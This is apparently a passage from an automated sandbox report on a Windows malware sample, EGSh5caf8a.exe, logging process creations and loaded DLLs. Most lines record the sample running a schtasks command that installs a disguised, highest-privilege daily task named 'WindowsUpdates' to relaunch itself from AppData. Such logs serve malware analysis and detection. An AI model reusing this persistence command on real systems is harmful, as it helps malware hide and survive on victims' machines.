            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:54 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:38 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:39 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:40 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:41 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:42 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:43 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:44 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:45 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:46 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:47 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:48 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:49 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:50 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:51 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:52 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:53 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:55 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:56 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 11:57 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:01 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:07 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:13 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:17 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:21 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "SCHtAsKs.EXe" /create /tn WindowsUpdates797722446 /tr "C:\Users\user\AppData\Roaming\MicrosoftwindowsUpdates\Accounts_Ledger_Software.eXE" /st 12:25 /du 9999:59 /sc daily /ri 1 /f /RL HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\EGSh5caf8a.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
